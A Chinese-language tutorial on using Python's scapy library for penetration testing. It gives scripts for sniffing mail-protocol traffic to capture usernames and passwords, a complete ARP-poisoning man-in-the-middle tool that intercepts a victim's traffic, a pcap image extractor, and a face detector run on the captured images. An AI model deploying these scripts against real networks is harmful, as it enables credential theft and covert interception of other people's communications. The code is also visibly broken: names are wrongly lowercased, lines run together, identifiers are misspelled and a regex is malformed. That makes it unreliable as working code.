scapy 是一个用来解析底层网络数据包的python模块和交互式程序,该程序对底层包处理进行了抽象打包,使得对网络数据包的处理非常简便。该类库可以在在网络安全领域有非常广泛用例,可用于漏洞利用开发、数据泄露、网络监听、入侵检测和流量的分析捕获的。scapy与数据可视化和报告生成集成,可以方便展示起结果和数据。
窃取邮箱身份凭证scapy提供了一个名字简明扼要的接口函数sniff,它的定义是这样的:
sniff(filter = " ", iface = "any", prn = function, count = n)
filter参数允许你指定一个berkeley数据包过滤器(berkeley packet filter,bpf),用于过滤scapy嗅探到的数据包,也可以将此参数留空,表示要嗅探所有的数据包。
iface参数用于指定嗅探器要嗅探的网卡,如果不设置的话,默认会嗅探所有网卡。prn参数用于指定一个回调函数,每当遇到符合过滤条件的数据包时,嗅探器就会将该数据包传给这个回调函数,这是该函数接受的唯一参数。count参数可以用来指定你想嗅探多少包,如果留空的话,scapy就会一直嗅探下去。
mail_sniffer.py:
from scapy.all import sniffdef packet_callback(packet): print(packet.show())def main(): sniff(pro=packet_callback, count=1)if __name__ == '__main__': main()
在这个简单的嗅探器中,它只会嗅探邮箱协议相关的命令。
接下来我们将添加过滤器和回调函数代码,有针对性地捕获和邮箱账号认证相关的数据。
首先,我们将设置一个包过滤器,确保嗅探器只展示我们感兴趣的包。我们会使用bpf语法(也被称为wireshark风格的语法)来编写过滤器。你可能会在tcpdump、wireshark等工具中用到这种语法。先来讲一下基本的bpf语法。在bpf语法中,可以使用三种类型的信息:描述词(比如一个具体的主机地址、网卡名称或端口号)、数据流方向和通信协议,如图所示。你可以根据自己想找的数据,自由地添加或省略某个类型、方向或协议。
我们先写一个bpf:
from scapy.all import sniff, tcp, ip#the packet callbackdef packet_callback(packet): if packet[tcp].payload: mypacket = str(packet[tcp].paylaod) if 'user' in mypacket.lower() or 'pass' in mypacket.lower(): print(f"[*] destination: {packet[ip].dst}") print(f"[*] {str(packet[tcp].payload)}")def main(): #fire up the sniffer sniff(filter='tcp port 110 or tcp port 25 or tcp port 143',prn=packet_callback, store=0)#监听邮件协议常用端口#新参数store,把它设为0以后,scapy就不会将任何数据包保留在内存里if __name__ == '__main__': main()
arp投毒攻击逻辑:欺骗目标设备,使其相信我们是它的网关;然后欺骗网关,告诉它要发给目标设备的所有流量必须交给我们转发。网络上的每一台设备,都维护着一段arp缓存,里面记录着最近一段时间本地网络上的mac地址和ip地址的对应关系。为了实现这一攻击,我们会往这些arp缓存中投毒,即在缓存中插入我们编造的记录。
注意实验的目标机为mac
arper.py:
from multiprocessing import processfrom scapy.all import (arp, ether, conf, get_if_hwaddr, send, sniff, sndrcv, srp, wrpcap)import osimport sysimport timedef get_mac(targetip): packet = ether(dst='ff:ff:ff:ff:ff:ff')/arp(op="who-has", pdst=targetip) resp, _= srp(packet, timeout=2, retry=10, verbose=false) for _, r in resp: return r[ether].src return none class arper: def __init__(self, victim, gateway, interface='en0'): self.victim = victim self.victimmac = get_mac(victim) self.gateway = gateway self.gatewaymac = get_mac(gateway) self.interface = interface conf.iface = interface conf.verb = 0 print(f'initialized {interface}:') print(f'gateway ({gateway}) is at {self.gateway}') print(f'victim ({victim}) is at {self.gatewaymac}') print('_'*30) def run(self): self.poison_thread = process(target=self.poison) self.poison_thread.start() self.sniff_thread = process(target=self.sniff) self.sniff_thread.start() def poison(self): poison_victim = arp() poison_victim.op = 2 poison_victim.psrc = self.gateway poison_victim.pdst = self.victim poison_victim.hwdst = self.victimmac print(f'ip src: {poison_victim.psrc}') print(f'ip dst: {poison_victim.pdst}') print(f'mac dst: {poison_victim.hwdst}') print(f'mac src: {poison_victim.hwsrc}') print(poison_victim.summary()) print('_'*30) poison_gateway = arp() poison_gateway.op = 2 poison_gateway.psrc = self,victim poison_gateway.pdst = self.gateway poison_gateway.hwdst = self.gatewaymac print(f'ip src: {poison_gateway.psrc}') print(f'ip dst: {poison_gateway.pdst}') print(f'mac dst: {poison_gateway.hwdst}') print(f'mac_src: {poison_gateway.hwsrc}') print(poison_gateway.summary()) print('_'*30) print(f'beginning the arp poison. [ctrl -c to stop]') while true: sys.stdout.write('.') sys.stdout.flush() try: send(poison_victim) send(poison_gateway) except keyboardinterrupt: self.restore() sys.exit() else: time.sleep(2) def sniff(self, count=200): time.sleep(5) print(f'sniffing {count} packets') bpf_filter = "ip host %s" % victim packets = sniff(count=count, filter=bpf_filter, ifcae=self.interface) wrpcap('arper.pcap', packets) print('got the packets') self.restore() self.poison_thread.terminate() print('finished') def restore(self): print('restoring arp tables...') send(arp( op=2, psrc=self.gateway, hwsrc=self.gatewaymac, pdst=self.victim, hwdst='ff:ff:ff:ff:ff:ff'), count=5) send(arp( op=2, psrc=self.victim, hwsrc=self.victimmac, pdst=self.gateway, hwdst='ff:ff:ff:ff:ff:ff'), count=5) if __name__ == '__main__': (victim, gateway, interface) = (sys.argv[1], sys.argv[2], sys.argv[3]) myarp = arper(victim, gateway, interface) myarp.run()
pcap文件处理recapper.py:
from scapy.all import tcp, rdpcapimport collectionsimport osimport reimport sysimport zliboutdir = '/root/desktop/pictures'pcaps = '/root/downloads'response = collections.namedtuple('response', ['header','payload'])def get_header(payload): try: header_raw = payload[:payload.index(b'\r\n\r\n')+2] except valueerror: sys.stdout.write('_') sys.stdout.flush() return none header = dict(re.findall(r'?p<name>.*?): (?p<value>.*?)\r\n', header_raw.decode())) if 'content-type' not in header: return none return headerdef extract_content(response, content_name='image'): content, content_type = none, none if content_name in response.header['content-type']: content_type = response.header['content-type'].split('/')[1] content = response.payload[response.payload.index(b'\r\n\r\n')+4:] if 'content-encoding' in response.header: if response.header['content-encoding'] == "gzip": content = zlib.decompress(response.payload, zlib.max_wbits | 32) elif response.header['content-encoding'] == "deflate": content = zlib.decompress(response.payload) return content, content_typeclass recapper: def __init__(self, fname): pcap = rdpcap(fname) self.session = pcap.session() self.responses = list() def get_responses(self): for session in self.session: payload = b'' for packet in self.session[session]: try: if packet[tcp].dport == 80 or packet[tcp].sport == 80: payload += bytes(packet[tcp].payload) except indexerror: sys.stdout.write('x') sys.stdout.flush() if payload: header = get_header(payload) if header is none: continue self.responses.append(response(header=header, payload=payload)) def write(self, content_name): for i, response in enumerate(self.responses): content, content_type = extract_content(response, content_name) if content and content_type: fname = os.path.join(outdir, f'ex_{i}.{content_type}') print(f'writing {fname}') with open(fname, 'wb') as f: f.write(content)if __name__ == '__main__': pfile = os.path.join(pcaps, 'pcap.pcap') recapper = recapper(pfile) recapper.get_responses() recapper.write('image')
如果我们得到了一张图片,那么我们就要对这张图片进行分析,检查每张图片来确认里面是否存在人脸。对每张含有人脸的图片,我们会在人脸周围画一个方框,然后另存为一张新图片。
detector.py:
import cv2import osroot = '/root/desktop/pictures'faces = '/root/desktop/faces'train = '/root/desktop/training'def detect(srcdir=root, tgtdir=faces, train_dir=train): for fname in os.listdir(srcdir): if not fname.upper().endswith('.jpg'): continue fullname = os.path.join(srcdir, fname) newname = os.path.join(tgtdir, fname) img = cv2.imread(fullname) if img is none: continue gray = cv2.cvtcolor(img, cv2.color_bgr2gray) training = os.path.join(train_dir, 'haarcascade_frontalface_alt.xml') cascade = cv2.cascadeclassifier(training) rects = cascade.detectmultiscale(gray, 1.3,5) try: if rects.any(): print('got a face') rects[:, 2:] += rects[:, :2] except attributeerror: print(f'no faces fount in {fname}') continue # highlight the faces in the image for x1, y1, x2, y2 in rects: cv2.rectangle(img, (x1, y1), (x2, y2), (127, 255, 0), 2) cv2.imwrite(newname, img)if name == '__main__': detect()
以上就是python渗透测试入门之scapy库如何使用的详细内容。